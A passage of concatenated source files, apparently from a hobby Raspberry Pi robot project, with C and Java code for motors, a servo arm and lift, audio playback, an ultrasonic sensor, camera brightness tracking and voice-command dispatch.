// output.print("DIE");
// client.close();
}
catch(Exception e){
e.printStackTrace();
}
}
}
<file_sep>#include <wiringPi.h>
#include <stdio.h>
int shoot()
{
int input;
if (wiringPiSetupGpio() == -1)
return 1;
scanf("%d", &input);
if (input == 1) {
pinMode( 04, OUTPUT );
pinMode( 17, OUTPUT );
pinMode(27, OUTPUT);
pinMode(22, OUTPUT);
digitalWrite(04, 1);
digitalWrite( 17, 1 );
digitalWrite(27, 1);
digitalWrite(22, 1);
delay(10000);
digitalWrite(04, 0);
digitalWrite( 17, 0 );
digitalWrite(27, 0);
digitalWrite(22, 0);
}
return 0;
}
<file_sep>#include <stdio.h>
#include <stdlib.h>
#include <sys/time.h>
#include <wiringPi.h>
#include <wiringPiSPI.h>
#include <string.h>
#include <unistd.h>
#define SPI_CHANNEL 0
#define SURVO_OUT 12
#define MOTOR_OUT1 14
#define MOTOR_OUT2 15
#define SS_PORT 8
#define PR_U_CHANNEL 0
#define PR_D_CHANNEL 1
#define PS_CHANNEL 2
#define SLEEP 1000000
#define THRESHOLD_PR 1500
#define RANGE_PR 50
#define TERM_PR 10
#define CLOSE_TRS 980
#define OPEN_TRS 1200
#define RANGE_PS 50
#define TERM_PS 10
int fd_spi; //SPI descripter
int arm_open(){ //Arm open completely. When error, return -1
int a2dVal = 0;
unsigned char data[3];
digitalWrite(SS_PORT, 1);
pwmWrite(SURVO_OUT, 125);
int count = 0;
while(1) {
data[0] = 0b00000110;
data[1] = 0b00000000 | ((PS_CHANNEL & 0x03) << 6);
data[2] = 0;
digitalWrite(SS_PORT, 0);
wiringPiSPIDataRW (SPI_CHANNEL,data,sizeof(data));
digitalWrite(SS_PORT, 1);
a2dVal = (data[1]<< 8) & 0b111100000000;
a2dVal |= (data[2] & 0xff);
printf("%d\n", a2dVal);
if (a2dVal > OPEN_TRS) {
count++;
if (count > TERM_PS) {
break;
}
} else {
if (count > 0) {
count--;
}
}
usleep(SLEEP);
}
pwmWrite(SURVO_OUT, 75);
return 0;
}
int arm_close(){ //Arm catch or close. When error, return -1
int a2dVal = 0, buff = 0;
unsigned char data[3];
digitalWrite(SS_PORT, 1);
pwmWrite(SURVO_OUT, 25);
int count = 0, over = 0;
while(1) {
data[0] = 0b00000110;
data[1] = 0b00000000 | ((PS_CHANNEL & 0x03) << 6);
data[2] = 0;
digitalWrite(SS_PORT, 0);
wiringPiSPIDataRW (SPI_CHANNEL, data,sizeof(data));
digitalWrite(SS_PORT, 1);
a2dVal = (data[1]<< 8) & 0b111100000000;
a2dVal |= (data[2] & 0xff);
printf("%d\n", a2dVal);
if (a2dVal > CLOSE_TRS) { //Close limit over
over++;
if (over > TERM_PS) {
break;
}
} else {
if (over > 0) {
over--;
}
}
if ((buff - RANGE_PS) < a2dVal && a2dVal < (buff + RANGE_PS)) {//Stop by catching
count++;
if (count > TERM_PS) {
break;
}
} else {
count = 0;
}
buff = a2dVal;
usleep(SLEEP);
}
pwmWrite(SURVO_OUT, 75);
return 0;
}
int arm_fclose(){ //Arm catch or close. When error, return -1
int a2dVal = 0;
unsigned char data[3];
digitalWrite(SS_PORT, 1);
pwmWrite(SURVO_OUT, 25);
int over = 0;
while(1) {
data[0] = 0b00000110;
data[1] = 0b00000000 | ((PS_CHANNEL & 0x03) << 6);
data[2] = 0;
digitalWrite(SS_PORT, 0);
wiringPiSPIDataRW (SPI_CHANNEL, data,sizeof(data));
digitalWrite(SS_PORT, 1);
a2dVal = (data[1]<< 8) & 0b111100000000;
a2dVal |= (data[2] & 0xff);
printf("%d\n", a2dVal);
if (a2dVal > CLOSE_TRS) { //Close limit over
over++;
if (over > TERM_PS) {
break;
}
} else {
if (over > 0) {
over--;
}
}
usleep(SLEEP);
}
pwmWrite(SURVO_OUT, 75);
return 0;
}
int raise(){ //Lift rises. When error, return -1
int a2dVal = 0;
unsigned char data[3];
digitalWrite(SS_PORT, 1);
digitalWrite(MOTOR_OUT1, 0);
digitalWrite(MOTOR_OUT2, 0);
int count = 0;
digitalWrite(MOTOR_OUT2, 1);
while(1) {
data[0] = 0b00000110;
data[1] = 0b00000000 | ((PR_U_CHANNEL & 0x03) << 6);
data[2] = 0;
digitalWrite(SS_PORT, 0);
wiringPiSPIDataRW (SPI_CHANNEL,data,sizeof(data));
digitalWrite(SS_PORT, 1);
a2dVal = (data[1]<< 8) & 0b111100000000;
a2dVal |= (data[2] & 0xff);
printf("%d\n", a2dVal);
if (a2dVal > THRESHOLD_PR) {
count++;
if (count > TERM_PR) {
break;
}
} else {
if (count > 0) {
count--;
}
}
usleep(SLEEP);
}
digitalWrite(MOTOR_OUT1, 0);
digitalWrite(MOTOR_OUT2, 0);
return 0;
}
int lower(){ //Lift get down. When error, return -1
int a2dVal = 0;
unsigned char data[3];
struct timeval start, end;
digitalWrite(SS_PORT, 1);
digitalWrite(MOTOR_OUT1, 0);
digitalWrite(MOTOR_OUT2, 0);
int count = 0;
digitalWrite(MOTOR_OUT1, 1);
gettimeofday(&start, NULL);
while(1) {
data[0] = 0b00000110;
data[1] = 0b00000000 | ((PR_D_CHANNEL & 0x03) << 6);
data[2] = 0;
digitalWrite(SS_PORT, 0);
wiringPiSPIDataRW (SPI_CHANNEL,data,sizeof(data));
digitalWrite(SS_PORT, 1);
a2dVal = (data[1]<< 8) & 0b111100000000;
a2dVal |= (data[2] & 0xff);
printf("%d\n", a2dVal);
if (a2dVal > THRESHOLD_PR) {
count++;
if (count > TERM_PR) {
break;
}
} else {
if (count > 0) {
count--;
}
}
usleep(SLEEP);
}
gettimeofday(&end, NULL);
digitalWrite(MOTOR_OUT1, 0);
digitalWrite(MOTOR_OUT2, 0);
if (count > TERM_PR) {
return 0;
}
int sec = end.tv_sec - start.tv_sec;
int time = sec * 1000000 + end.tv_usec;
time -= start.tv_usec;
return time;
}
int lower_t(int clock){ //Lift get down. When error, return -1
int a2dVal = 0;
unsigned char data[3];
struct timeval start, end;
digitalWrite(SS_PORT, 1);
digitalWrite(MOTOR_OUT1, 0);
digitalWrite(MOTOR_OUT2, 0);
int count = 0;
digitalWrite(MOTOR_OUT1, 1);
gettimeofday(&start, NULL);
while(1) {
gettimeofday(&end, NULL);
int sec = end.tv_sec - start.tv_sec;
int time = sec * 1000000 + end.tv_usec;
time -= start.tv_usec;
if (time > clock) {
break;
}
data[0] = 0b00000110;
data[1] = 0b00000000 | ((PR_D_CHANNEL & 0x03) << 6);
data[2] = 0;
digitalWrite(SS_PORT, 0);
wiringPiSPIDataRW (SPI_CHANNEL,data,sizeof(data));
digitalWrite(SS_PORT, 1);
a2dVal = (data[1]<< 8) & 0b111100000000;
a2dVal |= (data[2] & 0xff);
printf("%d\n", a2dVal);
if (a2dVal > THRESHOLD_PR) {
count++;
if (count > TERM_PR) {
break;
}
} else {
if (count > 0) {
count--;
}
}
usleep(SLEEP);
}
digitalWrite(MOTOR_OUT1, 0);
digitalWrite(MOTOR_OUT2, 0);
return 0;
}
void stop(){ //Lift get down. When error, return -1
pwmWrite(SURVO_OUT, 75);
pinMode(MOTOR_OUT1, OUTPUT);
pinMode(MOTOR_OUT2, OUTPUT);
digitalWrite(MOTOR_OUT1, 0);
digitalWrite(MOTOR_OUT2, 0);
}
int init() {
if ((fd_spi = wiringPiSPISetup(SPI_CHANNEL, 1000000)) < 0) {
printf("SPISetup failed\n");
return -1;
}
if (wiringPiSetupGpio() == -1) {
fprintf(stderr, "WiringPi Initialize Error\n");
return -1;
}
pinMode(SURVO_OUT,PWM_OUTPUT);
pwmSetMode(PWM_MODE_MS);
pwmSetClock(375);
pwmSetRange(1024);
pinMode(SS_PORT, OUTPUT);
pinMode(MOTOR_OUT1, OUTPUT);
pinMode(MOTOR_OUT2, OUTPUT);
return 0;
}
void quit() {
close(fd_spi);
}
int main(){
char str[512];
if (init < 0) {
return -1;
}
while(1) {
memset(str, 0, sizeof(str));
scanf("%s",str);
if (strcmp("o", str) == 0) {
arm_open();
} else if (strcmp("c", str) == 0) {
arm_close();
} else if (strcmp("fc", str) == 0) {
arm_fclose();
} else if (strcmp("r", str) == 0) {
raise();
} else if (strcmp("l", str) == 0) {
lower();
} else {
stop();
}
}
}
<file_sep>import com.sun.jna.Library;
import com.sun.jna.Native;
public class HelloWorld {
public interface CLibrary extends Library {
CLibrary INSTANCE = (CLibrary)
Native.loadLibrary("c" , CLibrary.class);
void printf(String format, Object... args);
}
public static void main(String[] args) {
CLibrary.INSTANCE.printf("Hello, World\n");
}
}<file_sep>extern void g_init();
extern void g_go_straight(int front, unsigned short speed);
extern void g_left_wheel(unsigned short speed);
extern void g_right_wheel(unsigned short speed);
extern void g_turn(int left, unsigned short speed);
extern void g_stop();
extern void g_quit();
<file_sep>#include "move_api.h"
#include "stdio.h"
int main()
{
char c = 0;
g_init();
while(1){
c = getchar();
if(c=='q'){
break;
}else if(c == 's'){
g_stop();
}else if(c == 'f'){
g_go_straight(1,500);
}
}
g_quit();
}
<file_sep>#include <stdlib.h>
#include <stdio.h>
#include <signal.h>
#include "esd.h"
#define WAV "/home/pi/tes.wav"
#define BUFFER 4096
static unsigned char tmp[BUFFER];
int main(void)
{
FILE *fp;
int vol, count, len;
int esd;
int sock = -1, rate = ESD_DEFAULT_RATE;
esd_format_t format = 0;
unsigned char *host = NULL;
esd_info_t *esdctl;
format = ESD_BITS16 | ESD_STEREO | ESD_STREAM | ESD_PLAY;
/* --- デバイスのオープン */
esd = esd_open_sound(host);
fp = fopen(WAV, "r");
sock = esd_play_stream_fallback(format, rate, host, WAV);
esdctl = esd_get_all_info(esd);
/* --- 出力ループ */
while((len = fread(tmp, 1, BUFFER, fp)) > 0) {
write(sock, tmp, len);
}
esd_close(esd);
fclose(fp);
close(sock);
}
<file_sep>#include <stdio.h>
#include <stdlib.h>
#include <wiringPi.h>
#include <wiringPiSPI.h>
#define SPI_CHANNEL 0
#define SS_PORT 8
#define OPEN 1500
#define CLOSE 20
#define RANGE 50
#define TERM 3
int main(int argc, char **argv){
int retCode;
int a2dChannel = 0; // analog channel
int a2dVal = 0;
unsigned char data[3];
// SPI channel 0 を 1MHz で開始。
if (wiringPiSPISetup(SPI_CHANNEL, 1000000) < 0)
{
printf("SPISetup failed:\n");
return 0;
}
if (wiringPiSetupGpio() == -1) {
printf("GPIO set up error\n");
return 0;
}
pinMode(SS_PORT, OUTPUT);
digitalWrite(SS_PORT, 1);
int count = 0, op_co = 0, cl_co = 0, buff = 0;
while(1) {
data[0] = 0b00000110; // first byte transmitted -> start bit -> (SGL/DIF = 1,D2=0)
data[1] = 0b00000000; // second byte transmitted -> (D1=D0=0)
data[2] = 0; // third byte transmitted....don't care
digitalWrite(SS_PORT, 0);
retCode=wiringPiSPIDataRW (SPI_CHANNEL,data,sizeof(data));
digitalWrite(SS_PORT, 1);
a2dVal = (data[1]<< 8) & 0b111100000000; //first 4 bit
a2dVal |= (data[2] & 0xff);
printf("a2dVal=%d\n",a2dVal);
if (a2dVal > OPEN) {
op_co++;
if (op_co > TERM) {
printf("The arm opened completely.\n");
break;
}
cl_co = 0;
count = 0;
} else if (a2dVal < CLOSE) {
cl_co++;
if (cl_co > TERM) {
printf("The arm closed completely.\n");
break;
}
op_co = 0;
count = 0;
} else if (a2dVal < (buff + RANGE) && (buff + RANGE) < a2dVal) {
count++;
if (count > TERM) {
printf("The arm stopped.\n");
break;
}
op_co = 0;
cl_co = 0;
} else {
op_co = 0;
count = 0;
cl_co = 0;
}
buff = a2dVal;
usleep(10000);
}
}
<file_sep>/*-------------------------------------------------------
OSS - /dev/dsp test
--------------------------------------------------------*/
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/soundcard.h>
#include <sys/types.h>
#include <sys/stat.h>
#define DSP "/dev/dsp"
#define DIR_PATH "/home/pi/work/robot/RobotPrograms/resources/"
#define BUFFER 2048
#define STR_BUF 512
static unsigned char tmp[BUFFER];
int play(char *filename)
{
int fp, out;
int len, format;
char buf[STR_BUF];
/* --- フルパスの作成 --- */
sprintf(buf,"%s%s",DIR_PATH,filename);
printf("%s\n", buf);
/* --- デバイスのオープン */
fp = open(buf, O_RDONLY);
if(fp == -1)printf("error open\n");
out = open(DSP, O_WRONLY);
if(out == -1)printf("error open\n");
/* --- 音声デバイス設定 */
format = AFMT_S16_LE;
if(ioctl(out, SNDCTL_DSP_SETFMT, &format)<0)printf("error SNDCTL_DSP_SETFMT\n");
format = 1;
if(ioctl(out, SNDCTL_DSP_STEREO, &format)<0)printf("error SNDCTL_DSP_SPEED\n");
format = 22050/2;
if(ioctl(out, SNDCTL_DSP_SPEED, &format)<0)printf("error SNDCTL_DSP_SPEED\n");
/* --- 出力ループ */
while((len = read(fp, tmp, BUFFER)) > 0) {
write(out, tmp, len);
}
printf("close\n");
close(fp);
close(out);
}
<file_sep>#include <opencv2/core/core.hpp>
#include <opencv2/highgui/highgui.hpp>
#include <opencv2/imgproc/imgproc.hpp>
#include "stdio.h"
using namespace cv;
unsigned char max_intensity = 0;
int target_x = 0;
int target_y = 0;
int main(int, char**)
{
VideoCapture cap(0); // デフォルトカメラをオープン
if(!cap.isOpened()) // 成功したかどうかをチェック
return -1;
Mat brightness;
namedWindow("brightness",1);
for(;;)
{
Mat frame;
cap >> frame; // カメラから新しいフレームを取得
cv::cvtColor(frame, brightness, CV_BGR2GRAY);
unsigned char intensity = 0;
for( int y = 0; y < frame.rows; y++ ) {
for( int x = 0; x < frame.cols; x++ ) {
intensity = frame.at<unsigned char>(y, x); //X座標がx, Y座標がyに位置するピクセルの値を取得
if(intensity <= max_intensity){continue;}
// intensity is more than max_intensity
max_intensity = intensity;
target_x = x;
target_y = y;
}
}
printf("max is %d at %d,%d\n", max_intensity,target_x,target_y);
// 直線の描画(画像,始点,終点,色,線幅、連結する近傍数)
line(brightness, Point(brightness.cols / 2, brightness.rows), Point(target_x, target_y), Scalar(0,0,250), 3, 4);
imshow("brightness", brightness);
if(waitKey(30) >= 0) break;
}
// VideoCapture デストラクタにより,カメラは自動的に終了処理されます
return 0;
}
<file_sep>import com.sun.jna.Library;
import com.sun.jna.Native;
public interface PinkyuTester extends Library {
// loadLibraryの第一引数はあとで作成するlib***.soの***と一致させる。
String path = "/home/pi/work/robot/RobotPrograms/libpinkyu1.so";
PinkyuTester INSTANCE = (PinkyuTester) Native.loadLibrary(path, PinkyuTester.class);
// Cの関数名と一致させる
int main();
int getX();
int getY();
}
<file_sep>
public enum LR{
Left,
Right,
}
<file_sep>#include <stdio.h>
#include <stdlib.h> // chg akihito
#include <unistd.h> /* for read, write, close */
#include <sys/ioctl.h> /* for ioctl */
#include <sys/types.h> /* for open */
#include <sys/stat.h> /* for open */
#include <fcntl.h> /* for open */
#include <signal.h>
#include "driver/urbtc.h" /* Linux specific part */
#include "driver/urobotc.h" /* OS independent part */
#define SPEED 500
#define WHEEL_ZERO 1024
void setup_motor(struct uin *ibuf, struct uout *obuf, struct ccmd *cmd);
void go_straight(struct ccmd *cmd, unsigned short speed, int front);
void left_wheel(struct ccmd *cmd, unsigned short speed);
void right_wheel(struct ccmd *cmd, unsigned short speed);
void turn(struct ccmd *cmd, unsigned short speed, int left);
void stop(struct ccmd *cmd);
int quit_flag = 1;
int fd;
struct uin ibuf;
struct uout obuf;
struct ccmd cmd;
void g_init()
{
setup_motor(&ibuf, &obuf, &cmd);
stop(&cmd);
}
void g_go_straight(int front, unsigned short speed)
{
go_straight(&cmd, speed, front);
}
void g_left_wheel(unsigned short speed)
{
left_wheel(&cmd, speed);
}
void g_right_wheel(unsigned short speed)
{
right_wheel(&cmd, speed);
}
void g_turn(int left, unsigned short speed)
{
turn(&cmd, speed, left);
}
void g_stop()
{
stop(&cmd);
}
void g_quit()
{
stop(&cmd);
close(fd);
}
void setup_motor(struct uin *ibuf, struct uout *obuf, struct ccmd *cmd)
{
int i = 0;
char *dev = "/dev/urbtc0";
if ((fd = open(dev, O_RDWR)) == -1) {
fprintf(stderr, "%s: Open error\n", dev);
exit(1);
}
cmd->retval = 0 /* RETURN_VAL */;
cmd->setoffset = CH0 | CH1 | CH2 | CH3;
cmd->setcounter = CH0 | CH1 | CH2 | CH3;
cmd->resetint = CH0 | CH1 | CH2 | CH3;
cmd->selin = CH0 | CH1 | CH2 | CH3 | SET_SELECT;
#if 0
cmd->dout = DOUT0 | DOUT1 | DOUT2 | DOUT3; /*digital out (ON/OFF out)*/
#endif
cmd->dout = 0;
cmd->selout = SET_SELECT | CH0 | CH1 | CH2 | CH3; /* EEPROM $B%G!<%?$,@5$7$1$l$PITMW(B */
/*---$B3F%A%c%s%M%k$N%*%U%;%C%HCM$N@_Dj(B---*/
#if __BYTE_ORDER == __LITTLE_ENDIAN
cmd->offset[0] = cmd->offset[1] = cmd->offset[2] = cmd->offset[3] = 0x7fff;
cmd->counter[0] = cmd->counter[1] = cmd->counter[2] = cmd->counter[3] = 0;
cmd->magicno = 0x00;
#else
cmd->offset[0] = cmd->offset[1] = cmd->offset[2] = cmd->offset[3] = 0xff7f;
cmd->counter[0] = cmd->counter[1] = cmd->counter[2] = cmd->counter[3] = 0;
cmd->magicno = 0x00;
#endif
cmd->posneg = SET_POSNEG | CH0 | CH1 | CH2 | CH3;
cmd->breaks = SET_BREAKS | CH0 | CH1 | CH2 | CH3;
cmd->wrrom = 0; /* WR_MAGIC | WR_OFFSET | WR_SELOUT;*/
/*---ccmd$B$N%b!<%I$K@Z$jBX$($k(B---*/
/*---$B0J8e!$(Bccmd$B%b!<%I$K@Z$jBX$($i$l$k$^$G!$%b!<%I$O0];}$5$l$k(B---*/
if (ioctl(fd, URBTC_COUNTER_SET) < 0) {
fprintf(stderr, "ioctl: URBTC_COUNTER_SET error\n");
exit(1);
}
// printf("sizeof(cmd) %d\n", sizeof(cmd));
/*---ccmd$B$NCM$r(BH8$B$K=q$-9~$`(B---*/
if (write(fd, cmd, sizeof(cmd)) < 0) {
fprintf(stderr, "write error\n");
exit(1);
}
#if 0
/*set scmd mode*/
if (ioctl(fd, URBTC_DESIRE_SET) < 0) {
fprintf(stderr, "ioctl: URBTC_DESIRE_SET error\n");
exit(1);
}
#endif
for (i = 0; i < 4; i++) {
#if __BYTE_ORDER == __LITTLE_ENDIAN
obuf->ch[i].x = 0;
obuf->ch[i].d = 0;
obuf->ch[i].kp = 0;
obuf->ch[i].kpx = 1;
obuf->ch[i].kd = 0;
obuf->ch[i].kdx = 1;
obuf->ch[i].ki = 0;
obuf->ch[i].kix = 1;
#else
obuf->ch[i].x = 0;
obuf->ch[i].d = 0;
obuf->ch[i].kp = 0;
obuf->ch[i].kpx = 0x0100;
obuf->ch[i].kd = 0;
obuf->ch[i].kdx = 0x0100;
obuf->ch[i].ki = 0;
obuf->ch[i].kix = 0x0100;
#endif
}
}
void go_straight(struct ccmd *cmd, unsigned short speed, int front)
{
unsigned short a = WHEEL_ZERO;
unsigned short b = WHEEL_ZERO;
if (front) {
a += speed;
b -= speed;
} else {
a -= speed;
b += speed;
}
a <<= 5;
b <<= 5;
cmd->offset[1] = a;
cmd->offset[2] = b;
if (ioctl(fd, URBTC_COUNTER_SET) < 0) {
fprintf(stderr, "ioctl: URBTC_COUNTER_SET error\n");
exit(1);
}
if (write(fd, cmd, sizeof(*cmd)) <= 0) {
fprintf(stderr, "write cmd error\n");
exit(1);
}
}
void left_wheel(struct ccmd *cmd, unsigned short speed)
{
unsigned short a = WHEEL_ZERO;
a += speed;
a <<= 5;
cmd->offset[1] = a;
if (ioctl(fd, URBTC_COUNTER_SET) < 0) {
fprintf(stderr, "ioctl: URBTC_COUNTER_SET error\n");
exit(1);
}
if (write(fd, cmd, sizeof(*cmd)) <= 0) {
fprintf(stderr, "write cmd error\n");
exit(1);
}
}
void right_wheel(struct ccmd *cmd, unsigned short speed)
{
unsigned short a = WHEEL_ZERO;
a += -speed;
a <<= 5;
cmd->offset[2] = a;
if (ioctl(fd, URBTC_COUNTER_SET) < 0) {
fprintf(stderr, "ioctl: URBTC_COUNTER_SET error\n");
exit(1);
}
if (write(fd, cmd, sizeof(*cmd)) <= 0) {
fprintf(stderr, "write cmd error\n");
exit(1);
}
}
void turn(struct ccmd *cmd, unsigned short speed, int left)
{
unsigned short a = WHEEL_ZERO;
unsigned short b = WHEEL_ZERO;
if (left) {
a -= speed;
b -= speed;
} else {
a += speed;
b += speed;
}
a <<= 5;
b <<= 5;
cmd->offset[1] = a;
cmd->offset[2] = b;
if (ioctl(fd, URBTC_COUNTER_SET) < 0) {
fprintf(stderr, "ioctl: URBTC_COUNTER_SET error\n");
exit(1);
}
if (write(fd, cmd, sizeof(*cmd)) <= 0) {
fprintf(stderr, "write cmd error\n");
exit(1);
}
}
void stop(struct ccmd *cmd)
{
unsigned short zero = WHEEL_ZERO;
zero <<= 5;
cmd->offset[1] = zero;
cmd->offset[2] = zero;
write(fd, cmd, sizeof(*cmd));
}
<file_sep>public class ShootApp implements IApplication {
public void Start() {
AudioLib.INSTANCE.play("Hassha.wav");
}
public void Quit() {
ShooterLib.INSTANCE.stop_moter();
}
public void Update() {
return;
}
public int Cleanup() {
return 0;
}
public void Order(String word) {
System.out.println(word);
if (word.equals("uchikorose"))
ShooterLib.INSTANCE.start_moter();
}
public boolean IsRunning(){
return true;
}
}
<file_sep>import com.sun.jna.Library;
import com.sun.jna.Native;
public interface AudioLib extends Library {
String path = "/home/pi/work/robot/RobotPrograms/libaudio_api.so";
AudioLib INSTANCE = (AudioLib) Native.loadLibrary(path, AudioLib.class);
// Cの関数名と一致させる
void play(String filename);
}
<file_sep>#include <wiringPi.h>
#include <stdio.h>
void start_moter()
{
int input;
if (wiringPiSetupGpio() == -1)
return;
pinMode( 04, OUTPUT );
digitalWrite(04, 1);
}
void stop_moter()
{
digitalWrite(04, 0);
}
<file_sep>#include <stdio.h>
#include <stdlib.h> // chg akihito
#include <unistd.h> /* for read, write, close */
#include <sys/ioctl.h> /* for ioctl */
#include <sys/types.h> /* for open */
#include <sys/stat.h> /* for open */
#include <fcntl.h> /* for open */
#include <signal.h>
#include "driver/urbtc.h" /* Linux specific part */
#include "driver/urobotc.h" /* OS independent part */
#define SPEED 500
#define WHEEL_ZERO 1024
void exit_program();
void setup_motor(struct uin *ibuf,struct uout *obuf,struct ccmd *cmd);
void go_straight(struct ccmd *cmd, unsigned short speed, int front);
void turn(struct ccmd *cmd, unsigned short speed, int left);
void stop(struct ccmd *cmd);
int quit_flag = 1;
int fd;
int main(int argc, char **argv)
{
struct uin ibuf;
struct uout obuf;
struct ccmd cmd;
int i;
setup_motor(&ibuf, &obuf, &cmd);
stop(&cmd);
i = 0;
while(quit_flag) {
char c = 0;
c = getchar();
switch(c){
case 'f':
go_straight(&cmd, SPEED, 1);
printf("GO FRONT\n");
break;
case 'b':
go_straight(&cmd, SPEED, 0);
printf("GO BACK\n");
break;
case 'l':
turn(&cmd, SPEED, 1);
printf("TURN LEFT\n");
break;
case 'r':
turn(&cmd, SPEED, 0);
printf("TURN RIGHT\n");
break;
}
}
stop(&cmd);
close(fd);
return 0;
}
void setup_motor(struct uin *ibuf,struct uout *obuf,struct ccmd *cmd)
{
int i = 0;
char *dev = "/dev/urbtc0";
signal(SIGINT, exit_program);
if ((fd = open(dev, O_RDWR)) == -1) {
fprintf(stderr, "%s: Open error\n", dev);
exit(1);
}
cmd->retval = 0 /* RETURN_VAL */;
cmd->setoffset = CH0 | CH1 | CH2 | CH3;
cmd->setcounter = CH0 | CH1 | CH2 | CH3;
cmd->resetint = CH0 | CH1 | CH2 | CH3;
cmd->selin = CH0 | CH1 | CH2 | CH3 | SET_SELECT;
#if 0
cmd->dout = DOUT0 | DOUT1 | DOUT2 | DOUT3; /*digital out (ON/OFF out)*/
#endif
cmd->dout = 0;
cmd->selout = SET_SELECT | CH0 | CH1 | CH2 | CH3; /* EEPROM $B%G!<%?$,@5$7$1$l$PITMW(B */
/*---$B3F%A%c%s%M%k$N%*%U%;%C%HCM$N@_Dj(B---*/
#if __BYTE_ORDER == __LITTLE_ENDIAN
cmd->offset[0] = cmd->offset[1] = cmd->offset[2] = cmd->offset[3] = 0x7fff;
cmd->counter[0] = cmd->counter[1] = cmd->counter[2] = cmd->counter[3] = 0;
cmd->magicno = 0x00;
#else
cmd->offset[0] = cmd->offset[1] = cmd->offset[2] = cmd->offset[3] = 0xff7f;
cmd->counter[0] = cmd->counter[1] = cmd->counter[2] = cmd->counter[3] = 0;
cmd->magicno = 0x00;
#endif
cmd->posneg = SET_POSNEG | CH0 | CH1 | CH2 | CH3;
cmd->breaks = SET_BREAKS | CH0 | CH1 | CH2 | CH3;
cmd->wrrom = 0; /* WR_MAGIC | WR_OFFSET | WR_SELOUT;*/
/*---ccmd$B$N%b!<%I$K@Z$jBX$($k(B---*/
/*---$B0J8e!$(Bccmd$B%b!<%I$K@Z$jBX$($i$l$k$^$G!$%b!<%I$O0];}$5$l$k(B---*/
if (ioctl(fd, URBTC_COUNTER_SET) < 0){
fprintf(stderr, "ioctl: URBTC_COUNTER_SET error\n");
exit(1);
}
// printf("sizeof(cmd) %d\n", sizeof(cmd));
/*---ccmd$B$NCM$r(BH8$B$K=q$-9~$`(B---*/
if (write(fd, cmd, sizeof(cmd)) < 0) {
fprintf(stderr, "write error\n");
exit(1);
}
#if 0
/*set scmd mode*/
if (ioctl(fd, URBTC_DESIRE_SET) < 0){
fprintf(stderr, "ioctl: URBTC_DESIRE_SET error\n");
exit(1);
}
#endif
for (i=0; i<4; i++) {
#if __BYTE_ORDER == __LITTLE_ENDIAN
obuf->ch[i].x = 0;
obuf->ch[i].d = 0;
obuf->ch[i].kp = 0;
obuf->ch[i].kpx = 1;
obuf->ch[i].kd = 0;
obuf->ch[i].kdx = 1;
obuf->ch[i].ki = 0;
obuf->ch[i].kix = 1;
#else
obuf->ch[i].x = 0;
obuf->ch[i].d = 0;
obuf->ch[i].kp = 0;
obuf->ch[i].kpx = 0x0100;
obuf->ch[i].kd = 0;
obuf->ch[i].kdx = 0x0100;
obuf->ch[i].ki = 0;
obuf->ch[i].kix = 0x0100;
#endif
}
}
void go_straight(struct ccmd *cmd, unsigned short speed, int front)
{
unsigned short a = WHEEL_ZERO;
unsigned short b = WHEEL_ZERO;
if(front){
a += speed;
b -= speed;
}else{
a -= speed;
b += speed;
}
a <<= 5;
b <<= 5;
cmd->offset[1] = a;
cmd->offset[2] = b;
if (ioctl(fd, URBTC_COUNTER_SET) < 0){
fprintf(stderr, "ioctl: URBTC_COUNTER_SET error\n");
exit(1);
}
if (write(fd, cmd, sizeof(*cmd)) <= 0){
fprintf(stderr, "write cmd error\n");
exit(1);
}
}
void turn(struct ccmd *cmd, unsigned short speed, int left)
{
unsigned short a = WHEEL_ZERO;
unsigned short b = WHEEL_ZERO;
if(left){
a -= speed;
b -= speed;
}else{
a += speed;
b += speed;
}
a <<= 5;
b <<= 5;
cmd->offset[1] = a;
cmd->offset[2] = b;
if (ioctl(fd, URBTC_COUNTER_SET) < 0){
fprintf(stderr, "ioctl: URBTC_COUNTER_SET error\n");
exit(1);
}
if (write(fd, cmd, sizeof(*cmd)) <= 0){
fprintf(stderr, "write cmd error\n");
exit(1);
}
}
void stop(struct ccmd *cmd)
{
unsigned short zero = WHEEL_ZERO;
zero <<= 5;
cmd->offset[1] = zero;
cmd->offset[2] = zero;
write(fd, cmd, sizeof(*cmd));
}
void exit_program(sig, code, scp, addr)
int sig;
int code;
struct sigcontext *scp;
char *addr;
{
quit_flag = 0;
fprintf(stderr, "kill signal is received\n");
}
<file_sep>#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/time.h>
#include <unistd.h>
#include <wiringPi.h>
#define TRIG_PIN 17
#define ECHO_PIN 27
#define MEASURE_INTERVAL 1
int
pulseIn(
int pin,
int level,
int timeout
) {
struct timeval tn, t0, t1;
long micros;
memset(&tn, 0, sizeof(struct timeval));
memset(&t1, 0, sizeof(struct timeval));
gettimeofday(&t0, NULL);
micros = 0;
while (digitalRead(pin) != level)
{
gettimeofday(&tn, NULL);
if (tn.tv_sec > t0.tv_sec) {
micros = 1000000L;
} else {
micros = 0;
}
micros += (tn.tv_usec - t0.tv_usec);
if (micros > timeout) {
return 0;
}
}
gettimeofday(&t1, NULL);
while (digitalRead(pin) == level)
{
gettimeofday(&tn, NULL);
if (tn.tv_sec > t0.tv_sec) {
micros = 1000000L;
} else {
micros = 0;
}
micros = micros + (tn.tv_usec - t0.tv_usec);
if (micros > timeout) {
return 0;
}
}
if (tn.tv_sec > t1.tv_sec) {
micros = 1000000L;
} else {
micros = 0;
}
micros = micros + (tn.tv_usec - t1.tv_usec);
return (int)micros;
}
void
measure_distance()
{
int duration, distance;
/* init sensor*/
digitalWrite(TRIG_PIN, LOW);
delayMicroseconds(2);
digitalWrite(TRIG_PIN, HIGH);
delayMicroseconds(10);
digitalWrite(TRIG_PIN, LOW);
/* measure distance */
duration = pulseIn(ECHO_PIN, HIGH, 1000000);
// printf("duration=%d\n",duration);
distance = (duration/2) / 29.1;
printf("distance=%d cm\n",distance);
}
int
main (
int argc,
char **argv
) {
int i;
if(wiringPiSetupGpio() == -1) {
return 1;
}
pinMode(TRIG_PIN,OUTPUT);
pinMode(ECHO_PIN,INPUT);
for(i=0; i<10; i++) {
measure_distance();
sleep(MEASURE_INTERVAL);
}
return(EXIT_SUCCESS);
}
<file_sep>import java.util.List;
interface ICore {
void Order(List<JuliusWord> wordList);
}
<file_sep>import java.util.Scanner;
class ThreadTester {
public static void main(String[] args) {
System.out.println("ThreadTester");
Scanner scan = new Scanner(System.in);
String str;
Process thread = new Process();
thread.start();
while(true){
System.out.println("Please Input :");
str = scan.next();
if(!str.equals("q"))continue;
System.out.println("Exit");
thread.Stop();
break;
}
return;
}
}
class Process extends Thread {
private boolean running = true;
public void start(){
